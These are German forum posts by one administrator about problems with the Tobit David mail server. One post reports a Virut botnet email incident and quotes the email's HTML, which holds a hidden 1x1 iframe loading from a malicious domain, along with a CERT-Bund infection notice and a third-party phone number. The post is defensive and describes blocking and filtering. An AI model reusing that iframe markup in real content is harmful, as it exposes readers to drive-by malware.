Beiträge von kingcopy

    Guten Tag,


    es ist nun offiziell, seid dem Rollout 310 haben wir einige Fälle in denen Anhänge der Email nicht mehr unter der Email angezeigt werden wenn man die Email aufmacht, in der Vorschau ist das Fenster "Anhang" noch vorhanden , von dort aus kann man die Anhänge öffnen.


    Das Problem tritt erst bei Anhängen mit LANGEN Dateinamen auf ! Kürzt man die Namen der Anhänge tauchen Sie auch unterhalb der Nachricht wieder auf...


    Es ist kein Signatur Problem oder User Spezifisch, jeder User kann das durch lange Dateinamen nachstellen, auch sonst leere EMails erzeugen den Fehler.

    Nein ich transferiere David zu David und Server zu neuen Servern und nebenbei exportiere ich zum Spaß nach Outlook durch Verzeichnistransfers mit Pop3 um die Performancen zu messen.

    "ganz ehrlich: wie ziehst du einen david mit 500 GB+ um?"


    ich ziehe andauernd mit Terrabytes um...

    Ich exportiere die Postfacher einzeln User für User und lasse die Daten im Live System hinzuaddieren...


    Dauer: 14 Tage bis einen Monat...

    Guten Tag,


    es ist nun endgültig geschehen: Ich habe in diversen Firmen Warnungen das aufgrund der Bild Vorschaufunktionen bösartige Codes die sich in Bilddateien verstecken , geladen werden, dabei genügt es lediglich mit der Maus oder dem Cursor die Mail zu markieren und schon gehts los!


    Ich dachte auf einen Schlag jeder Mitarbeiter klickt mir Schadlinks an obwohl wöchentliche Schulungen und die MA sagten Sie haben überhaubt nichts aufgemacht.....



    ZB:

    Ereignistyp: Ein gefährlicher Link wurde blockiert.

    Programm\Name: david® Client

    Programm\Pfad: C:\Program Files (x86)\Tobit InfoCenter\

    Programm\Prozess-ID: 9804

    Komponente: Schutz vor Web-Bedrohungen

    Ergebnis\Beschreibung: Verboten

    Ergebnis\Typ: Bösartiger Link

    Ergebnis\Name: xxxxxxxxxxxx

    Ergebnis\Bedrohungsstufe: Hoch

    Ergebnis\Genauigkeit: Genau

    Objekt: xxxxxxxxxxxxxxxxxxxx

    Objekt\Typ: Webseite

    Objekt\Pfad: xxxxxxxxxxxxxxxxxx

    Objekt\Name: 00.jpg

    Grund: Automatische Analyse


    dabei werden die Links in den Speicher geladen und die Grafiken enthalten Malform...


    natürlich kann man in den Zwangseinstellungen die Funktion: ANSICHT > Vorschau > Grafiken und Videos in Vorschau anzeigen / Deaktivieren


    aber... wie könnte man das zwischen Internen und Externen Nachrichten unterscheiden?


    Intern benötigen wir das.... hat jemand Vorschläge?

    gescheite datenhaltung anstatt millionen einzelne files zu erzeugen.


    also das was alle anderen mailserver seit jahren können.

    Für das: VETO / genau wegen das ist der David Client einem Exchange "in Zeiten von SSD" überlegen.


    wobei das System optimiert werden kann, hat er aber auch schon in Bezug auf die Ablagefunktion in dem aus den vielen Dateien eine PACK Datei erzeugt wird.

    Na ich hatte mich schon gewundert warum die Sensorik einen erhöhten Speicherbedarf angezeigt hatte:


    Speicher u.U. nicht freigegeben

    In Einzelfällen konnte es vorkommen, dass Speicher nicht wieder freigegeben wurde.


    ServiceLayer Memory LEAK Man!

    Hi, es war bei uns auch, der PRIMUX USB Adapter ist instabil. er bleibt nach Tagen , manchmal Wochen hängen indem er "freezed" . Zu sehen an der nicht mehr Reaktion der LEDs, daraus resultiert der Layer 1 Fehler, der Komplette USB Port wird durch diesen Freeze beeinträchtigt sodas ein Server Restart notwendig wurde.


    am Tag gehen da auch schonmal 1000 Faxe durch.


    Das ist auch kein Softwarefehler sondern direkt die Hardware des Adapters.
    Es ist eine Art "Idlefehler" der Hardware. Kein Stressfehler.


    Ich konnte das Problem mit keiner Methode beheben sodaß ich den Primx USB rausgeschmissen und durch die Primux PCI-E Karte ersetzt habe , die seitdem stabil läuft.


    Probiert wurden:


    - Stromfilter

    - Stromverstärker

    - alle Arten von USB Ports und Controller

    - USB HUBS

    - alle Treiber und Firmware auf und ab.

    - Neu Installierte Server Systeme

    - Alle Arten der Hardware und Motherboards

    - alle Arten von Betriebsystemen

    - USB Kabel

    - Extra Abschirmungen / Alu Folie etc.


    die Arbeiten fanden von Oktober 2018 - Januar 2019 täglich statt.

    bei der Budget Entwicklung eines ca. 20.000 Euro David Systems von 4 Terrabyte

    mit einer Durchsatzrate von 2891,51 MB pro Sekunde.


    Was bin ich froh das es gerade stabil läuft.

    Guten Morgen,

    es kommen seid David 300 vermehrt Crash Meldungen rein, von unterschiedlichen Workstations:


    Windows ist: 1809 / 10.0.17763.379 / Latest


    Hmmm... hat wer das auch?


    Station A: Intel 630 Graka Treiber 10-2018 > Erneuern auf 18.11.2018

    Station B: G-Force 1050 Ti / Treiber auf neuste...

    Wenn das ein paar und 90 MB kleiner ist als sonst, ist das multiple gepackt und wird wieder allerhand Schwierigkeiten mit den hiesigen Virenscannern und Firewalls auslösen.....

    Guten Tag,


    jetzt veröffentliche ich den Scheiss der mich seit Wochen beschäftigt:


    Es scheint als wenn der David Code anfällig wäre für einen von VIRUT Botnetz verursachten Schadcode der sich in gewisse Emails einbettet.


    die Command und Control Server sind schon vom BSI unter Kontrolle gebracht worden , was aber nicht daran hindert den Rückkanal aufzubauen.


    Es bettet sich in bestimmte emails ein Iframe Code ein , der schon bei Mouseover einen Rückkanal Öffnet:



    Siehe Attachment 1



    Am Anfang hat der Iframe exploit es geschafft einen Rückkanal zu der entsprechenden Adresse "nur durch Mouseover" zu Öffnen

    und dazu geführt das dass Bundesamt für Sicherheit in der Informationstechnik auf uns "aufmerksam" wurde und uns eine schlechte Reputation gegeben hat.


    Sogar unser Provider wurde kontaktiert, das wir angeblich "infiziert" sind:



    Betreff: [CB-Report#20181027-10002XXX9] Schadprogramm-Infektionen in AS61430



    [English version below]Sehr geehrte Damen und Herren,CERT-Bund hat aus vertrauenswürdigen externen Quellen Informationenzu IP-Adressen in Deutschland erhalten, unter denen sich mit hoherWahrscheinlichkeit Systeme befinden, welche mit einem Schadprogramminfiziert sind.Nachfolgend senden wir Ihnen eine Liste betroffener Systemein Ihrem Netzbereich. Neben der IP-Adresse des betroffenen Systems,Zeitstempel (UTC) und Bezeichnung der Schadprogramm-Familie sind jeweils(soweit uns diese Daten vorliegen) Quell-Port, Ziel-IP-Adresse, Ziel-Port,Ziel-Hostname und Protokoll zu der Verbindung angegeben, die vermutlichvon einem Schadprogramm ausgelöst wurde, um Kontakt zu einemKontrollserver aufzunehmen.Die meisten der hier gemeldeten Schadprogramme verfügen über Funktionenzum Identitätsdiebstahl (Ausspähen von Benutzernamen und Passwörtern)und/oder zur Manipulation der Kommunikation beim Online-Banking.Wir möchten Sie bitten, den Sachverhalt zu prüfen und entsprechendeMaßnahmen zur Bereinigung der Systeme einzuleiten bzw. Ihre Kundenzu informieren.Weitere Informationen zu dieser Benachrichtigung finden Sie unter:<https://reports.cert-bund.de/schadprogramme>Diese E-Mail ist mittels PGP digital signiert.Informationen zu dem verwendeten Schlüssel finden Sie unter:<https://reports.cert-bund.de/digitale-signatur>Bitte beachten Sie:Dies ist eine automatisch generierte Nachricht. Antworten an dieAbsenderadresse <reports@reports.cert-bund.de> werden NICHT gelesenund automatisch verworfen. Bei Rückfragen wenden Sie sich bitteunter Beibehaltung der Ticketnummer [CB-Report#...] in derBetreffzeile an <certbund@bsi.bund.de>.!! Bitte lesen Sie zunächst unsere HOWTOs und FAQ, welche unter!! <https://reports.cert-bund.de/> verfügbar sind.--------------------------------------------------------------------------------Dear Sir or Madam,from trusted external sources, CERT-Bund received information onIP addresses geolocated in Germany which are most likely hostinga system infected with malware.Please find below a list of affected systems on yournetwork. Each record includes the IP address of the affected system,a timestamp (UTC) and the name of the related malware family.If available, the record also includes the source port, destination IP,destination port and destination hostname for the connection mostlikely triggered by the malware to connect to a command-and-controlserver.Most of the malware families reported here include functions foridentity theft (harvesting of usernames and passwords) and/oronline-banking fraud.We would like to ask you to check the issues reported and to takeappropriate steps to get the infected hosts cleaned up or notifyyour customers accordingly.Additional information on this notification is available at:<https://reports.cert-bund.de/en/malware>This message is digitally signed using PGP.Information on the signature key is available at:<https://reports.cert-bund.de/en/digital-signature>Please note:This is an automatically generated message. Replies to thesender address <reports@reports.cert-bund.de> will NOT be readbut silently be discarded. In case of questions, please contact<certbund@bsi.bund.de> and keep the ticket number [CB-Report#...]of this message in the subject line.!! Please make sure to consult our HOWTOs and FAQ available at!! <https://reports.cert-bund.de/en/> first.--------------------------------------------------------------------------------Bitte teilen Sie uns an <certbund@bsi.bund.de> mit, wenn Sie die Datenzu betroffenen Systemen als Dateianhang statt inline erhalten möchten.Please let us know at <certbund@bsi.bund.de> if you would like to receivethe data on affected systems as a file attachment instead of inline.--------------------------------------------------------------------------------Betroffene Systeme in Ihrem Netzbereich:Affected hosts on your networks:"asn","ip","timestamp","malware","src_port","dst_ip","dst_port","dst_host","proto""61430","185.126.XXX.XXX","2018-10-26 09:12:55","virut","54675","148.81.111.121","80","",""Mit freundlichen Grüßen / Kind regardsTeam CERT-BundBundesamt für Sicherheit in der InformationstechnikFederal Office for Information Security (BSI)Referat CK22 - CERT-BundGodesberger Allee 185-189, 53175 Bonn, Germany


    Das einzige was wir machen konnten ist die Factory zu Informieren , aber die Raffen es nicht. Es scheint als spreche man mit dämlichen NPCs

    Wir haben in der Firmenfirewall die Adresse direkt gesperrt sodaß kein aktiver Kanal mehr geöffnet werden kann, was aber das Problem an sich nicht löst. Jeder andere könnte auf gleiche Art und Weise , es ausnutzen.


    Uns zwar befindet sich zwischen den Zeilen ein malformed IFRAME der eine Grafik oder was auch immer versucht in die Zeilen einzubetten:


    Zitat

    No.9 xxxxxxxxxxxxxxxxxxxxxxxone,</span><br style="font-size: 16px;"><span style="font-size: 16px;">Yongkang&nbsp;<span data="321300" t="7" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; z-index: 1;">321300</span>, XXXXXXX, China</span><br style="font-size: 16px;"><span style="font-size: 16px;">Mob:<span data="0086-0000000000000" t="7" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; z-index: 1;">0086-18358959935</span></span><div style="font-size: 16px;">Tel:<span data="xxxxxxxxxxxxx93" t="7" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; z-index: 1;">0086-579-0000000000</span><br>Fax:<span data="0086-579-87294002" t="7" isout="1" style="border-bottom-color: rgb(204, 204, 204); border-bottom-width: 1px; border-bottom-style: dashed; position: static; z-index: 1;">0086-579-87294002</span><br></div></div><div><a href="http://www.xxxxxxxxxx.com/" target="_blank" style="font-size: 16px; font-family: Calibri; line-height: 22px; background-color: window; text-decoration: none !important;">http://www.xxxxxxxxxxxxx.com</a></div><iframe src="http://ZieF.pl/rc/" width="1" height="1" style="border:0"></iframe>

    </div></span></div>

    <blockquote style="margin-top: 0px; margin-bottom: 0px; margin-left: 0.5em;"><div>&nbsp;</div><div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm"><div style="PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-SIZE: 12px;FONT-FAMILY:tahoma;COLOR:#000000; BACKGROUND: #efefef; PADDING-BOTTOM: 8px; PADDING-TOP: 8px"><div><b>From:</b>&nbsp;<a


    Ich habe schon versucht nach und nach alle Dienste der Vorschau zu deaktivieren aber immernoch ohne Ergebnis. Hat jemandnoch eine Idee?


    David kann alle EMails die den "Zief" Code beinhalten rausfilter und löschen durch Globale Spam Regel: Nicht erlaubter Inhalt: ZieF.pl


    Danach nehme ich alle vorhandenen Emails mit dem Code und wandele diese in reine Text Form um... aber es sind hunderte

    Moin,


    vielleicht hat irgendwer eine Idee,


    hier läuft mir in einem David das COMMON Verzeichnis voll und ich weiß nicht warum.

    dort liegen jetzt schon 250.000 Dateien unterschiedlicher Art, also nicht ein und dieselben Daten.


    die Daten werden nicht im David Client unter Unverteilt angezeigt.


    was passiert wenn ich die 250.000 Dateien dort lösche? Verlieren dann die User ihre Emails oder Inhalte?


    EDIT: ich habe die Dateien getraced, es scheinen die Verteilregeln obwohl auf Original Datei verschieben, die Ursprungsdatei im Unverteilten nicht gelöscht zu werden. Ich habe einen Datensatz eliminiert um zu schauen ob sich das bei der nächsten Bereinigung auf den "duplizierten Datensatz" auswirkt.

    Moin,


    kann mir irgendwer sagen wo ich das Arc Intercom finde... Ich finde überhaupt keine Möglichkeit mehr mit Tobit in Kontakt zu treten...


    sollte das nicht alles so unglaublich Toll und Übersichtlich sein?


    Hintergrund: Uns fehlt eine Rechnung von JANUAR aber mit der Lizenzverknüpfung bei Geldtransaktionen steht "keine"

    Hi,

    ich habe nun einen Totalen Zusammenbruch einer Spedition diese hatten doch tatsächlich noch Version 11.00a 2555 drauf, das ging mit der vorherigen Windows 10 version noch einwandfrei aber jetzt ist ende.

    Wenn ich den neuen David Kernel besorge lässt sich das 11.xxx damit einfach Updaten und werden dann alle Emails übernommen? Das hatte ich schon 6 jahre nicht mehr so ein gravierendes update.